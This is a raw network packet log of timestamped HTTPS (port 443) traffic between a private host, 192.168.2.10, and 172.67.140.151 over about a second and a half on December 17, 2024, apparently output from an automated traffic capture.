                                                                                    Dec 17, 2024 08:38:35.539278030 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.539287090 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.539309025 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.546916008 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.546927929 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.546942949 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.547020912 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.547020912 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.547049046 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.547059059 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.547139883 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.554075956 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.554088116 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.554135084 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.554152012 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.554214954 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.554225922 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.554250956 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.561752081 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.561785936 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.561897039 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.561897039 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.561907053 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.568489075 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.568511009 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.568552017 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.568566084 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.568614960 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.683927059 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.709664106 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.709681988 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.709703922 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.709722042 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.709729910 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.709747076 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.709780931 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.709856987 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.709872007 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.709939957 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.716187954 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.716202021 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.716219902 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.716228008 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.716247082 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.716258049 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.716260910 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.716367960 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.723598003 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.723617077 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.723638058 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.723651886 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.723664999 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.723737001 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.723746061 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.723793983 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.731117964 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.731132984 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.731159925 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.731190920 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.731194973 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.731204987 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.731251001 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.737670898 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.737698078 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.737782955 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.737782955 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.737792015 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.737950087 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.745615005 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.745644093 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.745722055 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.745731115 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.745780945 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.745780945 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.752115011 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.752154112 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.752201080 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.752208948 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.752227068 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.752255917 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.759581089 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.759603024 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.759685993 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.759692907 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.760083914 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.901839972 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.901871920 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.901966095 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.901979923 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.902015924 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.902015924 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.908529043 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.908546925 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.908621073 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.908631086 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.908745050 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.916043043 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.916059017 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.916132927 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.916152000 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.916438103 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.922502995 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.922519922 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.922676086 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.922703028 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.923265934 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.929975986 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.929992914 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.930083036 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.930083036 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.930104971 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.930236101 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.937063932 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.937082052 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.937170029 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.937187910 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.937366009 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.944492102 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.944509029 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.944719076 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.944735050 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.944854975 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.951946974 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.951968908 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.952029943 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.952044964 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.952173948 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.093776941 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.093801022 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.093867064 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.093888998 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.094052076 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.100663900 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.100692034 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.100788116 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.100788116 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.100806952 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.100889921 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.108118057 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.108143091 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.108194113 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.108211994 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.108254910 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.108254910 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.114662886 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.114677906 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.114758015 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.114778042 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.114907980 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.122170925 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.122205973 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.122322083 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.122339010 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.122370005 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.122872114 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.129208088 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.129230976 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.129301071 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.129314899 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.129340887 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.129487991 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.136734962 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.136763096 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.136821985 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.136846066 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.136939049 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.137156963 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.144398928 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.144416094 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.144505978 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.144522905 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.145287991 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.285938978 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.285964966 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.286048889 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.286065102 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.286271095 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.292689085 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.292705059 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.292789936 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.292803049 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.292834044 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.293044090 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.300129890 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.300146103 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.300271034 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.300282955 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.300390005 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.306615114 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.306629896 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.306746006 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.306760073 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.307133913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.314181089 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.314198971 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.314728975 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.314743996 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.314872026 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.321027994 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.321053028 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.321259022 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.321274996 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.321365118 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.328586102 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.328608990 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.328823090 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.328854084 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.330133915 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.335997105 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.336014986 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.336119890 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.336148977 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.338594913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.478106022 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.478133917 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.478249073 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.478249073 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.478267908 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.479712963 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.485232115 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.485265017 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.485315084 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.485327005 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.485368967 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.485368967 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.491722107 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.491741896 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.491797924 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.491813898 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.491859913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.492137909 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.499303102 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.499336958 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.499484062 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.499484062 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.499495029 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.499577045 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.506628990 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.506644964 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.506860971 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.506860971 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.506871939 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.507277012 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.513602972 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.513626099 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.513714075 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.513724089 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.513873100 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.513873100 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.521167040 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.521183968 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.521326065 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.521326065 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.521337986 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.522121906 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.527616024 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.527633905 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.527915001 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.527925014 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.528044939 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.670207024 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.670226097 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.670368910 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.670382977 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.671694994 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.677746058 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.677764893 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.677898884 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.677917004 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.679683924 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.684398890 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.684416056 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.684588909 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.684602022 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.687689066 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.691848040 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.691865921 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.692060947 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.692070961 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.695739985 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.699246883 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.699264050 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.699368954 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.699378967 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.699841976 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.706131935 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.706151962 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.706274986 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.706274986 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.706288099 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.707226038 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.707238913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.713722944 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.713738918 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.714014053 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.714027882 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.715739965 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.720153093 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.720170975 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.720766068 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.720774889 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.724021912 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.862560987 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.862588882 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.862757921 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.862775087 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.863697052 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.869335890 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.869354963 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.869519949 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.869529963 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.871695042 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.876862049 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.876879930 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.877279997 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.877290964 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.879697084 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.883461952 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.883483887 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.883621931 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.883634090 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.887702942 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.890791893 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.890814066 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.891392946 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.891406059 CET44349713172.67.140.151192.168.2.10
